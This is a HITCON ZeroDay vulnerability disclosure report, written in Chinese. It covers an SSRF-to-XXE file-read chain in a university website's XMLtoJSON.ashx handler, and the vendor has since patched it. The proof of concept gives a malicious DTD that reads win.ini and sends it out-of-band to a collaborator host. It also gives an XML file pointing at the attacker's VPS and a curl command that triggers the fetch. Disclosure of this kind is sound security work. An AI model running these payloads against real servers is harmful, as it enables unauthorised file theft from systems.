聖約翰科技大學 SSRF + XXE + LFI 漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2026-00930
  •  發信 Vendor: 聖約翰科技大學
  • Title: 聖約翰科技大學 SSRF + XXE + LFI 漏洞
  • Introduction: 網站使用不安全的 JavaScript,具備 LFI 的能力存取系統檔案

處理狀態

目前狀態

公開
Last Update : 2026/09/05
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2026/07/17 13:52:53 : 新提交 (由 LDenG 更新此狀態)
  • 2026/07/23 12:34:55 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/23 16:51:22 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/23 16:51:22 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/08/28 18:06:26 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/09/05 03:00:06 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2026-00930
  • 通報者:ldeng (LDenG)
  • 風險:高
  • 類型:本地檔案引入 (Local File Inclusion, LFI)

參考資料

攻擊者可經由該漏洞取得後端系統檔案及網站程式原始碼等敏感資料。

漏洞說明: OWASP - Testing for Local File Inclusion
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

Wikepedia 漏洞說明:
https://en.wikipedia.org/wiki/File_inclusion_vulnerability

OWASP Top 10 2007 - Malicious File Execution
https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://dept.sju.edu.tw/_functions/_pages/XMLtoJSON.ashx
https://dept.sju.edu.tw/_js/_comm.js

敘述

攻擊鍊

在 https://dept.sju.edu.tw/_js/_comm.js 中發現 AJAX 呼叫。
圖片

前端將使用者可控的 URL 透過 strURL 參數傳給 _functions/_pages/XMLtoJSON.ashx,由伺服器端發出 HTTP request 取得 XML 內容後轉為 JSON 回傳。經測試確認該 handler 未對 strURL 做白名單限制,存在 SSRF 漏洞。

攻擊者可以利用它讓伺服器 fetch 有惡意 DTD 的 XML,觸發 XXE 漏洞,再透過 file:// 讀取伺服器本機檔案並以 HTTP OOB 方式帶出。

PoC

在 VPS 上準備惡意 DTD (exfil.dtd)

Payload

<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://host.zlojsbxelqnd459rtriai4xbr2xtlkf84.oastify.com/?d=%file;'>">
%eval;
%exfil;

以及準備引用這個 DTD 的 XML (c.xml)

Payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://VPS_IP:8888/exfil.dtd">
%dtd;
]>
<Root><Table><data>test</data></Table></Root>

觸發 SSRF 讓目標 fetch 此 XML

Payload

curl -s -X POST "https://dept.sju.edu.tw/_functions/_pages/XMLtoJSON.ashx" \
-d "strURL=http://VPS_IP:8888/c.xml"

圖片

VPS 成功收到 target 的 fetch,確認存在 SSRF
圖片

Burp Suite Collaborator 收到來自 target 的 HTTP request,?d= 參數中包含 c:/windows/win.ini 的完整內容,右側為 URL decode 的內容
圖片

修補建議

1. 對 XMLtoJSON.ashx 設定 URL 白名單

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;